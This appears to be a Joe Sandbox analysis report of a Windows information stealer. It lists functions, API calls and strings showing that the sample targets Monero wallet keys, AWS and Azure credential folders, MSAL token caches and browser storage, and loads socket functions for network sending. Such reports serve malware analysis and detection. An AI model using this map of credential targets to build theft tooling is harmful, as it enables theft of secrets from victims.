                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 5a0d2e243e7071d9582b1a81f0ef588b9b03dfc7b5b924322a83353d36aca997
                                  • Instruction ID: 11089fd73b76b568fbc59b5043fc7faff7f4611457b30e273ffe8a8ac3a1f5d2
                                  • Opcode Fuzzy Hash: 5a0d2e243e7071d9582b1a81f0ef588b9b03dfc7b5b924322a83353d36aca997
                                  • Instruction Fuzzy Hash: 98E15D31A1120A9BDB61FFA6DC89AEE77F9AF44310F044024F915AB205DB38DD45EFA0
                                  Function 00FC6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6445
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FC64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: c874359781409eb85901f24659e1fa24767f640be4fefc12aa9063a3b0e619f4
                                  • Instruction ID: 72508fdc0b64f2892ca8eff9ebdaaa7d22022eec8c16c614da6f0839910026dd
                                  • Opcode Fuzzy Hash: c874359781409eb85901f24659e1fa24767f640be4fefc12aa9063a3b0e619f4
                                  • Instruction Fuzzy Hash: 7BF1AC70D0520A9BDB25EFA9DD4ABAE77B9AF44314F04442CB815DB285DB38DC41EFA0
                                  Function 00FC4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC43A3
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00FC4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00FC443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC44DF
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4507
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 00FC451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00FC4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FC45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC467B
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: 0925e974e1817c02982fae3c8f00f7c9b6055193437a01241bef7a603a5e1987
                                  • Instruction ID: a86e4cfe4fb8741ae2b6d54378c409ece464778552b516c394fe600ee1db3993
                                  • Opcode Fuzzy Hash: 0925e974e1817c02982fae3c8f00f7c9b6055193437a01241bef7a603a5e1987
                                  • Instruction Fuzzy Hash: D0B18F30A1120A9BDB25FFB5DE5AFAE77E9AF40314F140428B855E7245DB38EC41BB90
                                  Function 00FC57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FC5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC58F8
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5988
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC59B9
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC59C5
                                  • lstrlen.KERNEL32(01B9D640), ref: 00FC59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FC5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5BB5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 79a1695685408133a782c1c414fbd2ed2d5e54114902bd32017dbe5b389aee59
                                  • Instruction ID: df665085b7d800925e9e0b8166d85278da4fa295d870be5a17c9b64117d97b2e
                                  • Opcode Fuzzy Hash: 79a1695685408133a782c1c414fbd2ed2d5e54114902bd32017dbe5b389aee59
                                  • Instruction Fuzzy Hash: 0F02A771D116069BCB25EFA5C98AEEE7BF9AF44710F04412CF805A7241DB38ED85EB90
                                  Function 00FB1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB1135
                                    • Part of subcall function 00FB1120: RtlAllocateHeap.NTDLL(00000000), ref: 00FB113C
                                    • Part of subcall function 00FB1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FB1159
                                    • Part of subcall function 00FB1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FB1173
                                    • Part of subcall function 00FB1120: RegCloseKey.ADVAPI32(?), ref: 00FB117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FB11C0
                                  • lstrlen.KERNEL32(?), ref: 00FB11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 00FB11E8
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB121F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1251
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FB1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00FB1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00FB1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB12BA
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB12FF
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FB130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1378
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FB13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB143D
                                    • Part of subcall function 00FCEDE0: lstrcpy.KERNEL32(00000000,?), ref: 00FCEE12
                                  • DeleteFileA.KERNEL32(?), ref: 00FB1471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: cd0252518ce52223a28db8836e5fecf628f50b908f61864aa1f3a781ea90c59f
                                  • Instruction ID: 9240cff4587057221cdda7b88a3848c35ec1be5c748d31abbf104b203a0442fe
                                  • Opcode Fuzzy Hash: cd0252518ce52223a28db8836e5fecf628f50b908f61864aa1f3a781ea90c59f
                                  • Instruction Fuzzy Hash: 6CA16D71E112099BDB21EFA6DC99AEE77B9AF44310F440024F905E7241DB38EE41AFA1
                                  Function 00FCE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00FCE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FCE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00FCE7C6
                                  • memset.MSVCRT ref: 00FCE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FCE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00FCE886
                                  • memset.MSVCRT ref: 00FCE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FCE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FCE947
                                  • memset.MSVCRT ref: 00FCE986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: afec855525382b69dbd179624f616dddb52624465810beafc24eade79d13b893
                                  • Instruction ID: 830b9d65f62ca72f461fd02c8f2d2be7428aa930abf239530f7369354903ea43
                                  • Opcode Fuzzy Hash: afec855525382b69dbd179624f616dddb52624465810beafc24eade79d13b893
                                  • Instruction Fuzzy Hash: 5F714A71E40259ABDB71EBA0DC46FED7778AF48700F4404A8B619AB1C0DB74AE84AF54
                                  Function 00FCABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 00FCABCF
                                  • lstrlen.KERNEL32(01B9E0A0), ref: 00FCABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCACB7
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FCACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCACF3
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FCACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD28
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FCAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD5C
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FCAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAD91
                                  • lstrlen.KERNEL32(01B9E118), ref: 00FCADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 00FCAE85
                                  • lstrcpy.KERNEL32(00000000,01B9E160), ref: 00FCAEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 98cce34040e405e46f035204b609be81b241bc414768a8782fceb48fe0b6c111
                                  • Instruction ID: dbbe1652088c51d80508493e2c4cf4f56ea14ae2e87f30ecd196670a3b8e8685
                                  • Opcode Fuzzy Hash: 98cce34040e405e46f035204b609be81b241bc414768a8782fceb48fe0b6c111
                                  • Instruction Fuzzy Hash: 8BB1823091051B9BCB22EFA5DD49BAFB7B9BF40318F040528B415E7245DB38ED41EB92
                                  Function 00FD47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,00FC72A4), ref: 00FD47E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 00FD47FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00FD480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00FD481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 00FD482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00FD4840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00FD4851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00FD4862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00FD4873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00FD4884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00FD4895
                                  Strings
                                  Memory Dump Source
